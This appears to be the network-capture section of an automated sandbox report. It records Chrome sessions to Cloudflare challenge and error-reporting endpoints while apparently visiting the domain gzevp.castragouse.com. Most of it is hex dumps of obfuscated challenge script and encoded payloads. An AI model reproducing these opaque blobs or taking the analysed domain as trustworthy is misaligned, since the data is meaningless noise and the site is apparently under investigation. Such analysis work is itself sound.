                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 6a 53 3d 67 49 2c 6f 3d 7b 27 58 4c 79 45 53 27 3a 6a 53 28 31 36 38 36 29 2c 27 6f 4d 47 61 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 44 52 6e 64 59 27 3a 6a 53 28 31 30 38 37 29 2c 27 56 61 6a 71 55 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 6b 4f 45 66 72 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 4b 65 4f 42 44 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 68 3d 3d 3d 6e 75 6c 6c 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 67 45 28 68 29 2c 67 5b 6a 53 28 31 35 34 31 29 5d
                                                                                                                                                            Data Ascii: ,x,B,C,D,E,F){if(jS=gI,o={'XLyES':jS(1686),'oMGak':function(G,H){return G+H},'DRndY':jS(1087),'VajqU':function(G,H){return G+H},'kOEfr':function(G,H){return G+H},'KeOBD':function(G,H,I){return G(H,I)}},h===null||void 0===h)return j;for(x=gE(h),g[jS(1541)]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            17192.168.2.549735104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:46 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 2727
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            CF-Challenge: 91fa21b380c2c82
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:46 UTC2727OUTData Raw: 76 5f 38 63 66 32 65 64 39 61 36 63 32 36 34 31 64 65 3d 2d 58 52 51 54 51 45 51 58 51 35 51 25 32 62 74 24 75 74 24 50 51 74 66 78 67 4b 6c 74 62 24 4b 24 69 6d 66 6a 71 6e 24 31 57 72 24 6e 6e 74 70 24 6b 24 43 66 62 67 79 6e 42 4a 24 6b 51 57 58 63 57 4d 38 24 4e 51 6a 57 24 30 51 78 43 4a 4e 74 51 24 6c 24 74 73 51 42 62 24 78 35 6e 24 62 74 61 52 42 63 24 5a 50 69 6d 6f 35 5a 69 74 39 24 4c 24 47 45 44 55 35 78 51 74 67 24 5a 62 2d 6f 72 54 4e 56 79 45 71 70 24 6c 51 6e 51 24 50 24 4e 52 71 35 6a 66 36 4e 44 62 64 34 7a 58 51 24 55 64 6d 24 47 52 47 74 2d 67 70 24 42 55 39 24 36 43 50 24 74 43 71 69 4d 24 24 68 51 74 4f 61 78 51 45 2d 4d 39 39 5a 24 78 63 24 62 58 24 47 73 67 24 53 65 75 6b 24 36 39 24 4b 51 66 24 4a 64 4c 71 44 65 59 69 33 39 75 6b
                                                                                                                                                            Data Ascii: v_8cf2ed9a6c2641de=-XRQTQEQXQ5Q%2bt$ut$PQtfxgKltb$K$imfjqn$1Wr$nntp$k$CfbgynBJ$kQWXcWM8$NQjW$0QxCJNtQ$l$tsQBb$x5n$btaRBc$ZPimo5Zit9$L$GEDU5xQtg$Zb-orTNVyEqp$lQnQ$P$NRq5jf6NDbd4zXQ$Udm$GRGt-gp$BU9$6CP$tCqiM$$hQtOaxQE-M99Z$xc$bX$Gsg$Seuk$69$KQf$JdLqDeYi39uk
                                                                                                                                                            2024-10-08 03:08:46 UTC749INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:46 GMT
                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                            Content-Length: 154956
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-chl-gen: 3kidxIw6nomq+XlFc1J5ASOh+O1B0z/+bFlzQCc/Pfm0gssDXH2EFGz6YLLmPpquLBMUW5c7zL4xFLp/5DJNiURiP777+x+TMXP7JCAFNEuC3YjiHLv7Mcz4lYzDGDdgtYAWVMvJ5+d33NYK1FWqoef0UmIZq6Z4ybpdS0qekWJP2H2jY2OmgPf6PTszsT21EPwD4PtmbBz+08BeqjB07uIt0o7ZhsjietkA+yAqBJfIl8oJeAvxoKrPSmO8hDyFBazd/DiCpZnGr8nEhQQMP0uNlzvd3BpeNbYOMiXmiaxlUzy8sknqLFOO0TacVnT6FYDSZhldt0408wC/9CJKzirHq08RnazJizFL/4QLE4FEZUfyy2iJ71NucT+/v3tTbAboww0qzfVkKrgXb3KytnkeAytq6wosrm/KYoQsHry7YSKbCXIVDcROzHNeigiPP3hp3SwNDpzEYVjxkYqwSMbtHRo1ZUEAjy+PmAlCGETD8ZE5lU8qCPC282fNHr3oTJK9+O9j5j233r4E$XMVr59AXQN1uVNG/
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2eda65d5a8c6f-EWR
                                                                                                                                                            2024-10-08 03:08:46 UTC620INData Raw: 75 62 2f 47 6b 70 4f 6f 72 4c 75 74 68 59 32 78 72 61 62 4e 6e 38 76 4f 71 63 50 52 6b 39 57 54 75 39 72 49 32 64 2b 66 31 39 37 67 33 75 53 7a 77 4d 65 70 33 61 71 72 37 38 6e 68 72 38 57 39 7a 4d 33 33 78 74 54 55 73 74 58 4f 37 50 66 72 30 4e 54 5a 2f 62 33 47 76 51 66 49 35 66 62 4c 77 77 58 77 36 75 45 44 32 2b 66 6d 42 52 49 4e 35 2f 54 72 2b 52 50 34 37 52 49 61 49 66 6f 41 32 2b 55 6e 38 68 66 79 2b 66 6f 4b 2b 53 6f 49 2f 76 30 75 44 41 41 6c 38 76 59 45 4f 77 77 78 4d 78 6a 78 4d 6a 73 77 46 30 45 45 48 78 74 46 42 77 45 6b 48 53 52 4c 53 55 67 4f 54 7a 45 6d 54 30 73 75 43 31 63 73 56 6c 42 49 46 78 6c 54 4d 6d 51 31 48 6b 34 67 4a 47 68 55 4f 57 64 65 54 79 68 67 4f 79 67 37 53 45 73 32 54 6c 64 50 56 30 5a 76 57 32 6c 39 62 6b 45 2b 62 33 52
                                                                                                                                                            Data Ascii: ub/GkpOorLuthY2xrabNn8vOqcPRk9WTu9rI2d+f197g3uSzwMep3aqr78nhr8W9zM33xtTUstXO7Pfr0NTZ/b3GvQfI5fbLwwXw6uED2+fmBRIN5/Tr+RP47RIaIfoA2+Un8hfy+foK+SoI/v0uDAAl8vYEOwwxMxjxMjswF0EEHxtFBwEkHSRLSUgOTzEmT0suC1csVlBIFxlTMmQ1Hk4gJGhUOWdeTyhgOyg7SEs2TldPV0ZvW2l9bkE+b3R
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 6c 57 2b 46 5a 6b 36 58 65 34 78 32 6d 58 42 2b 6f 6d 52 34 63 34 4a 78 70 33 57 72 6a 59 75 44 69 70 6d 64 66 61 79 66 72 4b 2b 75 6c 5a 71 49 65 4b 6d 36 73 72 57 72 73 49 4b 63 70 62 69 47 76 62 36 6d 71 34 61 56 69 36 75 6a 70 4e 50 42 6b 61 7a 50 70 72 44 48 71 64 6d 75 78 64 54 41 6d 63 2f 50 7a 36 44 4e 73 62 6d 34 70 71 6d 31 6f 38 57 6b 70 71 4c 45 71 39 37 7a 37 73 72 58 74 66 50 37 34 2f 7a 31 31 66 72 4e 76 4d 72 55 34 64 73 47 38 50 34 4b 31 2f 6a 6b 2b 39 33 58 43 50 72 38 41 2b 7a 2b 36 77 72 71 41 75 30 4f 39 2f 4c 6d 44 53 48 76 45 4e 6e 6b 37 51 48 39 4a 2f 58 6b 2b 42 63 63 4c 2f 34 64 2f 75 77 4f 4b 79 51 33 43 43 55 48 39 42 63 7a 4c 44 38 52 46 77 2f 38 48 78 55 30 52 78 6c 46 46 77 55 73 51 7a 78 50 47 69 63 66 44 54 51 72 45 79 30
                                                                                                                                                            Data Ascii: lW+FZk6Xe4x2mXB+omR4c4Jxp3WrjYuDipmdfayfrK+ulZqIeKm6srWrsIKcpbiGvb6mq4aVi6ujpNPBkazPprDHqdmuxdTAmc/Pz6DNsbm4pqm1o8WkpqLEq97z7srXtfP74/z11frNvMrU4dsG8P4K1/jk+93XCPr8A+z+6wrqAu0O9/LmDSHvENnk7QH9J/Xk+BccL/4d/uwOKyQ3CCUH9BczLD8RFw/8HxU0RxlFFwUsQzxPGicfDTQrEy0
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 6d 2b 57 61 6c 68 78 64 70 47 67 59 57 4a 6a 6e 59 74 6d 6a 57 53 48 69 34 70 2f 69 48 35 74 67 59 4f 35 6b 58 4b 50 69 4a 57 33 6c 33 79 70 73 37 57 75 6f 70 4f 68 73 49 57 64 69 4a 2b 66 77 71 2b 76 76 4d 4c 44 6e 36 57 6d 6b 72 66 45 79 4a 6e 53 6d 61 32 30 77 5a 4f 63 75 36 7a 67 72 2b 4c 6d 74 38 6d 6b 31 4d 7a 6d 7a 4c 6a 64 76 64 50 4e 38 50 61 76 79 4f 76 46 32 39 58 4b 2f 72 66 53 31 2b 45 46 2b 51 4c 55 34 4e 44 31 2f 67 54 4d 36 4d 73 51 77 68 44 61 36 68 4d 4b 38 41 6b 47 43 42 6e 6b 48 50 50 6d 32 51 6b 43 46 50 63 61 41 79 41 52 48 78 49 6c 46 53 48 6c 35 52 34 52 41 52 45 6b 4c 41 41 76 45 51 63 50 4c 78 30 5a 4d 6a 73 61 38 6a 4a 44 4f 79 4d 54 41 53 49 45 4f 45 73 56 2f 68 73 4a 4d 44 46 41 55 78 34 2f 4c 53 59 6a 54 69 51 31 56 45 34 72
                                                                                                                                                            Data Ascii: m+WalhxdpGgYWJjnYtmjWSHi4p/iH5tgYO5kXKPiJW3l3yps7WuopOhsIWdiJ+fwq+vvMLDn6WmkrfEyJnSma20wZOcu6zgr+Lmt8mk1MzmzLjdvdPN8PavyOvF29XK/rfS1+EF+QLU4ND1/gTM6MsQwhDa6hMK8AkGCBnkHPPm2QkCFPcaAyARHxIlFSHl5R4RAREkLAAvEQcPLx0ZMjsa8jJDOyMTASIEOEsV/hsJMDFAUx4/LSYjTiQ1VE4r
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 4b 68 5a 6d 57 70 59 36 47 63 66 33 61 63 62 57 78 38 6a 36 61 66 68 34 71 67 74 61 74 36 6b 48 65 7a 65 4c 35 36 6f 4d 47 53 6f 61 4f 68 73 4d 50 44 6e 4d 43 4e 6f 72 76 45 76 4d 2f 43 6c 4c 44 49 75 4d 32 59 30 37 50 4f 72 64 65 33 72 4d 4b 76 74 71 37 58 6e 4d 44 59 32 2b 65 70 78 71 7a 6e 77 72 7a 52 36 63 62 41 30 66 58 51 36 4f 76 7a 7a 73 33 52 78 72 2f 38 30 75 2f 61 77 51 4c 78 39 39 6a 44 36 4f 73 4e 2f 41 54 35 45 64 76 53 39 41 30 52 38 50 54 76 46 64 72 6c 44 74 55 54 32 74 4c 65 42 42 50 69 38 77 45 59 34 2f 6b 4a 49 75 67 42 2f 41 6b 4f 2b 67 51 50 41 50 41 52 46 76 67 59 42 69 6b 75 50 41 30 76 4d 77 45 77 45 52 38 6e 46 52 49 68 41 53 67 57 54 53 70 44 4c 79 30 4e 53 53 63 69 54 46 5a 58 54 6b 51 72 4e 6b 55 56 54 45 77 72 51 52 56 6b 54
                                                                                                                                                            Data Ascii: KhZmWpY6Gcf3acbWx8j6afh4qgtat6kHezeL56oMGSoaOhsMPDnMCNorvEvM/ClLDIuM2Y07POrde3rMKvtq7XnMDY2+epxqznwrzR6cbA0fXQ6Ovzzs3Rxr/80u/awQLx99jD6OsN/AT5EdvS9A0R8PTvFdrlDtUT2tLeBBPi8wEY4/kJIugB/AkO+gQPAPARFvgYBikuPA0vMwEwER8nFRIhASgWTSpDLy0NSSciTFZXTkQrNkUVTEwrQRVkT
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 47 72 61 65 6d 72 49 69 63 62 35 39 7a 69 58 46 30 6f 62 53 56 71 35 61 50 75 49 71 37 73 36 2b 51 75 4a 65 6c 6c 5a 47 6f 79 62 75 64 71 71 54 4b 6d 73 32 62 6b 4b 36 6e 30 4c 61 76 6a 4a 4f 77 30 39 71 58 73 35 6d 30 6e 70 62 6c 34 65 47 36 36 61 48 45 7a 64 33 65 76 4f 43 73 30 4e 2f 4d 35 76 57 31 35 76 72 79 35 2b 66 53 30 65 66 4c 2b 4e 6e 39 38 64 76 54 2f 74 34 45 38 39 58 56 34 4e 76 58 45 4d 2f 49 33 51 6a 30 35 51 48 34 44 2f 58 5a 36 52 38 54 47 50 4c 36 47 67 33 61 4a 53 67 65 46 68 63 42 39 66 66 39 49 65 6f 51 48 51 63 6b 41 41 59 72 38 68 67 6c 4b 79 77 49 44 67 2f 36 49 43 30 78 41 6a 73 43 46 68 30 71 2b 77 55 6b 46 55 6b 59 53 30 38 65 4a 45 78 43 4e 44 38 51 4b 55 51 6d 50 44 5a 5a 58 78 67 78 56 43 35 45 50 6a 4e 6e 49 44 73 2b 4e 6b
                                                                                                                                                            Data Ascii: GraemrIicb59ziXF0obSVq5aPuIq7s6+QuJellZGoybudqqTKms2bkK6n0LavjJOw09qXs5m0npbl4eG66aHEzd3evOCs0N/M5vW15vry5+fS0efL+Nn98dvT/t4E89XV4NvXEM/I3Qj05QH4D/XZ6R8TGPL6Gg3aJSgeFhcB9ff9IeoQHQckAAYr8hglKywIDg/6IC0xAjsCFh0q+wUkFUkYS08eJExCND8QKUQmPDZZXxgxVC5EPjNnIDs+Nk
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 68 36 69 78 68 4b 4f 41 70 6f 79 75 64 33 61 59 72 71 6d 41 72 34 79 37 70 4a 75 2f 6d 35 32 67 69 59 71 49 6c 71 76 43 75 36 4f 72 7a 4e 47 31 6b 38 50 4b 72 35 61 78 6d 37 37 66 6b 73 71 7a 31 74 36 79 31 37 58 61 33 72 53 39 37 4d 37 66 7a 72 37 4f 33 73 32 73 74 4e 54 31 78 74 6e 69 31 65 62 4f 37 2f 7a 7a 37 50 4c 4d 42 76 44 79 33 4c 2f 35 33 41 44 63 78 75 67 51 33 75 4c 7a 37 76 34 51 35 42 62 56 39 2b 6b 62 37 52 55 57 39 4f 37 34 46 2b 41 62 37 67 54 79 2b 51 48 6b 48 79 49 63 2f 51 7a 38 4a 52 45 46 4b 41 67 69 43 53 45 51 4e 2f 6a 37 39 79 7a 39 46 68 4d 4d 4d 51 30 63 46 53 4a 46 47 51 4e 4e 47 69 49 4a 4c 55 5a 41 49 6b 51 74 50 6b 56 4d 55 54 67 38 54 31 55 5a 4f 53 6b 63 54 31 77 31 4d 68 31 5a 56 32 6c 4b 59 56 6f 6d 51 44 64 47 63 46 46
                                                                                                                                                            Data Ascii: h6ixhKOApoyud3aYrqmAr4y7pJu/m52giYqIlqvCu6OrzNG1k8PKr5axm77fksqz1t6y17Xa3rS97M7fzr7O3s2stNT1xtni1ebO7/zz7PLMBvDy3L/53ADcxugQ3uLz7v4Q5BbV9+kb7RUW9O74F+Ab7gTy+QHkHyIc/Qz8JREFKAgiCSEQN/j79yz9FhMMMQ0cFSJFGQNNGiIJLUZAIkQtPkVMUTg8T1UZOSkcT1w1Mh1ZV2lKYVomQDdGcFF
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 37 71 45 62 6f 70 34 6e 36 78 2b 6d 4a 32 50 6f 37 50 44 6c 35 4f 6b 77 37 32 61 77 72 65 6a 70 4d 69 64 74 61 65 6c 69 62 61 7a 7a 71 7a 4d 32 4c 36 35 31 61 71 35 76 74 32 62 70 75 66 61 77 4d 61 64 70 38 58 69 6f 61 7a 53 37 38 69 75 39 75 76 43 39 64 4c 46 79 75 33 62 30 38 66 37 79 51 50 68 38 2f 76 62 31 76 48 56 77 41 45 4c 34 2b 6f 52 2b 41 4c 4e 35 41 33 48 79 4e 55 4a 2b 76 44 6c 2b 4f 77 51 39 52 33 64 41 68 45 50 45 2f 45 4a 45 2f 30 4a 47 42 73 67 2b 65 73 4e 43 77 62 73 38 79 63 58 4b 78 6f 61 4a 53 73 64 2b 66 63 72 4b 2f 30 58 47 68 31 48 45 79 4e 43 49 6a 51 70 4e 68 59 58 50 54 38 65 52 6a 45 64 53 46 41 54 57 68 4d 35 57 69 73 36 4f 6a 70 4a 58 46 77 79 4d 78 67 7a 56 6b 64 64 59 56 6b 37 54 32 78 74 51 6e 42 6b 56 53 30 76 61 45 68 35
                                                                                                                                                            Data Ascii: 7qEbop4n6x+mJ2Po7PDl5Okw72awrejpMidtaelibazzqzM2L651aq5vt2bpufawMadp8XioazS78iu9uvC9dLFyu3b08f7yQPh8/vb1vHVwAEL4+oR+ALN5A3HyNUJ+vDl+OwQ9R3dAhEPE/EJE/0JGBsg+esNCwbs8ycXKxoaJSsd+fcrK/0XGh1HEyNCIjQpNhYXPT8eRjEdSFATWhM5Wis6OjpJXFwyMxgzVkddYVk7T2xtQnBkVS0vaEh5
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 47 41 65 4a 72 46 68 5a 4b 5a 74 4a 6e 4b 79 4a 76 45 70 38 69 4a 6b 63 2b 38 79 4c 43 31 30 70 4c 43 6f 72 79 6c 71 71 2f 65 76 61 44 65 34 62 4c 47 6e 75 57 37 76 71 6a 66 72 4d 6a 67 30 4f 54 6a 35 62 4c 6b 7a 63 54 7a 31 4d 7a 55 32 73 57 37 31 41 47 32 39 64 44 55 2f 76 41 43 39 2f 4d 4b 2f 50 7a 57 37 51 38 4f 43 52 50 63 45 67 2f 6f 34 42 59 54 37 4f 66 52 43 66 6f 51 43 4f 72 38 32 50 41 53 2b 68 67 47 34 69 63 4a 4b 69 6a 35 4c 4f 33 70 38 53 38 56 43 69 4c 77 49 7a 4d 44 4c 51 67 5a 4d 6a 6f 53 51 51 73 39 45 76 6f 69 49 68 63 69 47 44 78 46 47 53 6b 47 49 78 30 37 52 79 4a 47 54 69 35 46 45 42 6f 78 53 7a 52 4b 50 6a 31 62 4b 31 55 77 51 56 70 69 4f 6d 6b 7a 5a 54 6f 6a 53 6b 6f 2f 53 57 35 6b 62 55 46 52 4c 6b 74 46 57 6e 49 33 62 6c 46 4a 4e
                                                                                                                                                            Data Ascii: GAeJrFhZKZtJnKyJvEp8iJkc+8yLC10pLCorylqq/evaDe4bLGnuW7vqjfrMjg0OTj5bLkzcTz1MzU2sW71AG29dDU/vAC9/MK/PzW7Q8OCRPcEg/o4BYT7OfRCfoQCOr82PAS+hgG4icJKij5LO3p8S8VCiLwIzMDLQgZMjoSQQs9EvoiIhciGDxFGSkGIx07RyJGTi5FEBoxSzRKPj1bK1UwQVpiOmkzZTojSko/SW5kbUFRLktFWnI3blFJN
                                                                                                                                                            2024-10-08 03:08:46 UTC1369INData Raw: 41 77 62 6d 30 6d 6f 65 66 79 6f 33 41 71 71 75 53 78 36 37 58 76 38 43 76 74 64 48 47 73 4d 65 7a 31 75 43 30 34 4e 54 67 35 2b 44 68 32 64 53 36 70 37 2f 71 72 65 44 4b 79 37 33 51 76 2b 2f 74 75 4c 50 61 74 72 76 32 36 4c 48 7a 79 37 54 43 76 66 6e 33 38 4e 49 44 32 50 7a 34 39 76 7a 4c 2b 2f 41 51 42 66 54 64 44 39 41 61 36 2b 37 31 46 74 67 59 43 74 33 65 33 52 6e 74 31 2f 41 68 4a 65 51 64 43 41 55 68 39 69 6a 74 43 52 37 73 43 77 30 4a 38 52 41 78 45 7a 6b 36 45 7a 59 32 2b 55 41 37 51 7a 73 41 4f 77 4d 66 4b 53 67 4b 43 41 63 58 49 6b 78 4d 55 30 45 48 4e 69 45 31 4c 42 67 71 46 6b 70 53 4c 54 41 67 54 52 6c 55 55 47 5a 5a 57 45 4e 4b 5a 46 59 38 4f 30 4e 61 54 58 46 79 4b 6d 46 50 61 46 6c 36 53 44 6f 36 54 56 39 52 54 46 31 65 65 55 42 68 58 6f
                                                                                                                                                            Data Ascii: Awbm0moefyo3AqquSx67Xv8CvtdHGsMez1uC04NTg5+Dh2dS6p7/qreDKy73Qv+/tuLPatrv26LHzy7TCvfn38NID2Pz49vzL+/AQBfTdD9Aa6+71FtgYCt3e3Rnt1/AhJeQdCAUh9ijtCR7sCw0J8RAxEzk6EzY2+UA7QzsAOwMfKSgKCAcXIkxMU0EHNiE1LBgqFkpSLTAgTRlUUGZZWENKZFY8O0NaTXFyKmFPaFl6SDo6TV9RTF1eeUBhXo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            18192.168.2.54973635.190.80.14434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:46 UTC542OUTOPTIONS /report/v4?s=iY8t1GJjaPxMe6k27xxXb3Q81XqYo1trRmM5GarmCLIhiYPWFYzS711KMvWTcKCPu0NCnHVzFHNyw%2FN4cMXrCj%2B%2BbYjORqbee%2BALnfokBiJlsGtauvlGGT1nTD4XLg%3D%3D HTTP/1.1
                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Origin: https://gzevp.castragouse.com
                                                                                                                                                            Access-Control-Request-Method: POST
                                                                                                                                                            Access-Control-Request-Headers: content-type
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:47 UTC336INHTTP/1.1 200 OK
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            access-control-max-age: 86400
                                                                                                                                                            access-control-allow-methods: OPTIONS, POST
                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                            access-control-allow-headers: content-type, content-length
                                                                                                                                                            date: Tue, 08 Oct 2024 03:08:46 GMT
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            19192.168.2.54973735.190.80.14434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:47 UTC478OUTPOST /report/v4?s=iY8t1GJjaPxMe6k27xxXb3Q81XqYo1trRmM5GarmCLIhiYPWFYzS711KMvWTcKCPu0NCnHVzFHNyw%2FN4cMXrCj%2B%2BbYjORqbee%2BALnfokBiJlsGtauvlGGT1nTD4XLg%3D%3D HTTP/1.1
                                                                                                                                                            Host: a.nel.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 436
                                                                                                                                                            Content-Type: application/reports+json
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:47 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 37 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 7a 65 76 70 2e 63 61 73 74 72 61 67 6f 75 73 65 2e 63 6f 6d 2f 66 7a 46 41 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                                                                                            Data Ascii: [{"age":1,"body":{"elapsed_time":572,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://gzevp.castragouse.com/fzFA/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                                                                                            2024-10-08 03:08:47 UTC168INHTTP/1.1 200 OK
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            date: Tue, 08 Oct 2024 03:08:47 GMT
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            20192.168.2.549738104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:47 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:47 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:47 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 7
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-chl-out: xli2b4jcJwYin/bvmaL3QvOGLTkE3URUTo4=$LVrylXwZgsnCXOCM
                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2edadd95d6a4f-EWR
                                                                                                                                                            2024-10-08 03:08:47 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            21192.168.2.549739104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:48 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cf2ed9a6c2641de/1728356926476/d0b746da8873d4f65ab80d8b6cd196c528cd2de035e23a9105e09ed097c28824/GvsOwHEulO0pCOy HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: cors
